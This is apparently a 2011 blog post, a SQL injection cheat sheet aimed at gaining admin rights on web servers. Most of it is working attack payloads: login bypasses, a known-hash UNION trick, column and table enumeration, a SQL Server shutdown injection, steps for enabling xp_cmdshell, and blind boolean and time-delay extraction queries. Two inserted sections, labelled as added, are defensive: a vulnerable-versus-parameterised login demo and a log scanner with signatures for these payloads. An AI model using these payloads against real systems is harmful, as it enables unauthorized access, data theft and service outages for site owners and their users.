- SQL Injection Attacks
Sunday, October 16, 2011
In the world of hackers and hacking this method of exploiting web-based services is very common. As the name SQL injection (SQL: Structured Query Language) suggests, we are going to use some common SQL queries. SQL is a very strong 4GL language generally used by database programmers to manipulate the databases behind systems, servers and application software. Here I will give you some popularly used SQL queries which help you get admin rights on web servers.
The letters after each heading mark the databases a trick applies to: M for MySQL, S for SQL Server, P for PostgreSQL, O for Oracle, and + for other databases as well.
SOME COMMON PASSWORDS
Bypassing Login Screens (SMO+)
SQL Injection 101, Login tricks
· admin' --
· admin' #
· admin'/*
· ' or 1=1--
· ' or 1=1#
· ' or 1=1/*
· ') or '1'='1--
· ') or ('1'='1--
· ...
· Login as different user (SM*): ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
*Old versions of MySQL don't support UNION queries
Bypassing second MD5 hash check login screens
If the application first fetches the record by user name and then compares the returned MD5 with the MD5 of the supplied password, you need some extra tricks to fool the application and bypass authentication. You can UNION the result with a known user name and the MD5 hash of the password you supply. In this case the application compares your password against the MD5 hash you supplied instead of the MD5 from the database.
Username : admin
Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
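The login tricks above all rely on the user name or password being pasted into the SQL text. The following is an added example, not code from the original post, that models the two-step login described in this section against an in-memory SQLite database: a vulnerable version built by string concatenation, and the same logic with a bound parameter. The user, the stored password and the query shape are assumptions; the known-hash UNION payload is the page's trick placed in the user-name field, because that is where this assumed query interpolates input.

```python
import hashlib
import hmac
import sqlite3

# Constructed demo database (not from the page): one user whose password is
# stored as an MD5 hex digest, mirroring the scenario the page describes.
DEMO_USER = "admin"
DEMO_PASSWORD = "s3cret-not-1234"  # constructed value


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_md5 TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", (DEMO_USER, md5_hex(DEMO_PASSWORD)))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Fetch the record by user name with string concatenation, then compare
    hashes. Assumed query shape: the user name lands inside a quoted literal."""
    sql = "SELECT username, password_md5 FROM users WHERE username = '%s'" % username
    row = conn.execute(sql).fetchone()
    if row is None:
        return False
    # The second check is sound on its own, which is why "admin' --" alone does
    # not get in; the UNION trick defeats it by making the database return a
    # row whose hash the caller chose.
    return row[1] == md5_hex(password)


def login_safe(conn, username, password):
    """Same two-step logic, but the user name is bound as a parameter, so
    quotes, UNION and -- inside it are plain data, never SQL."""
    row = conn.execute(
        "SELECT username, password_md5 FROM users WHERE username = ?",
        (username,),
    ).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[1], md5_hex(password))


# The page's known-hash trick in the user-name field (81dc9b... is MD5("1234")).
UNION_PAYLOAD = "x' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055' --"

if __name__ == "__main__":
    db = build_db()
    print("comment trick, vulnerable code    :", login_vulnerable(db, "admin' --", "guess"))
    print("known-hash UNION, vulnerable code :", login_vulnerable(db, UNION_PAYLOAD, "1234"))
    print("known-hash UNION, safe code       :", login_safe(db, UNION_PAYLOAD, "1234"))
    print("real credentials, safe code       :", login_safe(db, "admin", DEMO_PASSWORD))
```

The parameterised query is the whole fix: the database receives the user name as a value, so the comparison step never sees an attacker-chosen row. The MD5 storage is kept only to match the page's scenario; it is not a password hashing scheme to copy.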
Error Based – Find Columns Names
Finding Column Names with HAVING BY – Error Based (S)
In the same order,
· ' HAVING 1=1 --
· ' GROUP BY table.columnfromerror1 HAVING 1=1 --
· ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
· ' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- and so on
· If you are not getting any more errors then it's done.
Finding how many columns are in the SELECT query by ORDER BY (MSO+)
Finding the column count with ORDER BY can speed up the UNION SQL injection process.
· ORDER BY 1--
· ORDER BY 2--
· ORDER BY N-- and so on
· Keep going until you get an error. The error tells you the number of selected columns: it is the last N that worked.
SQL Injection in LIMIT (M) or ORDER (MSO)
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;
If the injection is in the second LIMIT argument you can comment it out or use it in your UNION injection.
Shutdown SQL Server (S)
When you are really pissed off: ';shutdown --
Enabling xp_cmdshell in SQL Server 2005
By default xp_cmdshell and a couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable them.
EXEC sp_configure 'show advanced options',1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
Finding Database Structure in SQL Server (S)
Getting User defined Tables
SELECT name FROM sysobjects WHERE xtype = 'U'
Getting Column Names
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
Blind SQL Injections
About Blind SQL Injections
In a reasonably good production application you generally cannot see error responses on the page, so you cannot extract data through UNION attacks or error-based attacks. You have to use blind SQL injection attacks to extract data. There are two kinds of blind SQL injection.
Normal blind: you cannot see a response in the page, but you can still determine the result of a query from the response or the HTTP status code.
Totally blind: you cannot see any difference in the output at all. This can be an injection into a logging function or similar. Not so common though.
In normal blinds you can use IF statements or abuse the WHERE clause in the injection (generally easier); in totally blinds you need to use some waiting functions and analyze response times. For this you can use WAIT FOR DELAY '0:0:10' in SQL Server, BENCHMARK() in MySQL, pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in Oracle.
This output was taken from a real private blind SQL injection tool while exploiting a SQL Server back-ended application and enumerating table names. These requests were made for the first character of the first table name. The SQL queries are a bit more complex than necessary for automation reasons. Here we are trying to determine the ASCII value of a character via a binary search algorithm.
The TRUE and FALSE flags mark whether each query returned true or false.
TRUE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--
FALSE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--
TRUE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103--
FALSE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--
TRUE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89--
FALSE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--
TRUE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--
FALSE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--
FALSE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--
Since both of the last two queries failed, we know that the first character of the table name has ASCII value 80, which means the first character is `P`. This is the way to exploit blind SQL injections with a binary search algorithm. The other well-known way is reading data bit by bit. Both can be effective in different conditions.
Waiting For Blind SQL Injections
First of all, use this only if it's really blind; otherwise just use 1/0 style errors to identify the difference. Second, be careful while using times longer than 20-30 seconds: the database API connection or the script can time out.
WAIT FOR DELAY 'time' (S)
This is just like sleep: wait for the specified time. A CPU-safe way to make the database wait.
WAITFOR DELAY '0:0:10'--
You can also use fractions like this:
WAITFOR DELAY '0:0:0.51'
Real World Samples
· Are we 'sa'? if (select user) = 'sa' waitfor delay '0:0:10'
· ProductID = 1;waitfor delay '0:0:10'--
· ProductID =1);waitfor delay '0:0:10'--
· ProductID =1';waitfor delay '0:0:10'--
· ProductID =1');waitfor delay '0:0:10'--
· ProductID =1));waitfor delay '0:0:10'--
· ProductID =1'));waitfor delay '0:0:10'--
BENCHMARK() (M)
Basically we are abusing this function to make MySQL wait a bit. Be careful, you will consume the web server's limits very fast!
BENCHMARK(howmanytimes, do this)
Real World Samples
· Are we root? woot! IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))
· Check whether a table exists in MySQL: IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))
pg_sleep(seconds) (P)
Sleep for the supplied number of seconds.
· SELECT pg_sleep(10);
Sleeps for 10 seconds.
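Both blind techniques covered above leave distinctive traces in web server access logs: the boolean binary search shows up as a burst of near-identical requests that differ only in an ASCII(SUBSTRING(...)) comparison, and the time-based variants carry WAITFOR DELAY, BENCHMARK() or pg_sleep() in the request. The following is an added example from the defender's side, not part of the original post: it URL-decodes each request path, matches it against signatures built from the payload shapes on this page, and flags a client that sends repeated character probes. The log lines, client addresses, the /product.asp path and the threshold of three probes are all constructed for the demo.

```python
import re
from collections import defaultdict
from urllib.parse import quote, unquote_plus

# Indicators taken from the techniques on this page, applied to the URL-decoded
# request path. Each entry is (rule name, compiled regex).
SIGNATURES = [
    ("time_delay", re.compile(r"waitfor\s+delay|benchmark\s*\(|pg_sleep\s*\(", re.I)),
    ("char_extraction", re.compile(r"ascii\s*\(\s*substring\s*\(", re.I)),
    ("union_select", re.compile(r"union\s+(all\s+)?select", re.I)),
    ("schema_enum", re.compile(r"sysobjects|syscolumns|information_schema", re.I)),
    ("dangerous_proc", re.compile(r"xp_cmdshell|sp_configure|;\s*shutdown", re.I)),
    ("error_probe", re.compile(r"having\s+1\s*=\s*1|order\s+by\s+\d+\s*--", re.I)),
]

# Combined-format access log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(decoded_query):
    """Return the sorted rule names that match one decoded request string."""
    return sorted(name for name, rx in SIGNATURES if rx.search(decoded_query))


def scan_log(lines, blind_threshold=3):
    """Aggregate hits per client. A client that sends several ASCII(SUBSTRING(...))
    comparisons is doing the character-by-character search shown in the
    transcript above, so it is flagged once it crosses blind_threshold probes."""
    per_ip = defaultdict(lambda: {"requests": 0, "flagged": 0, "rules": set(), "char_probes": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the scan
        entry = per_ip[m.group("ip")]
        entry["requests"] += 1
        hits = classify_request(unquote_plus(m.group("path")))
        if hits:
            entry["flagged"] += 1
            entry["rules"].update(hits)
            if "char_extraction" in hits:
                entry["char_probes"] += 1
    return {
        ip: {
            "requests": e["requests"],
            "flagged": e["flagged"],
            "rules": sorted(e["rules"]),
            "likely_blind_extraction": e["char_probes"] >= blind_threshold,
        }
        for ip, e in per_ip.items()
    }


# Constructed sample log (not real traffic). 10.0.0.9 replays the first four
# binary-search steps from the page's transcript against an assumed product page.
_PROBE = ("ProductID=1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects "
          "WHERE xtYpe=0x55),1,1)),0){cmp}--")
LOG_LINES = [
    '10.0.0.5 - - [16/Oct/2011:10:00:01 +0000] "GET /product.asp?ProductID=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [16/Oct/2011:10:00:02 +0000] "GET /product.asp?ProductID=1%3Bwaitfor+delay+%270%3A0%3A10%27-- HTTP/1.1" 200 512',
    '10.0.0.11 - - [16/Oct/2011:10:00:03 +0000] "GET /search.asp?q=union+station HTTP/1.1" 200 2048',
    '10.0.0.7 - - [16/Oct/2011:10:00:04 +0000] "POST /login.asp HTTP/1.1" 302 0',
] + [
    '10.0.0.9 - - [16/Oct/2011:10:00:%02d +0000] "GET /product.asp?%s HTTP/1.1" 200 512'
    % (5 + i, quote(_PROBE.format(cmp=cmp), safe="=,()"))
    for i, cmp in enumerate([">78", ">103", "<103", ">89"])
]

if __name__ == "__main__":
    for ip, summary in sorted(scan_log(LOG_LINES).items()):
        print(ip, summary)
```

Decoding before matching matters: the probes arrive percent-encoded, and signatures run against the raw line would miss `%3E78--`. The per-client counter is what separates a single odd-looking request from the sustained probing that enumerating even one table name requires, and the same aggregation can be fed by POST bodies if the application logs them.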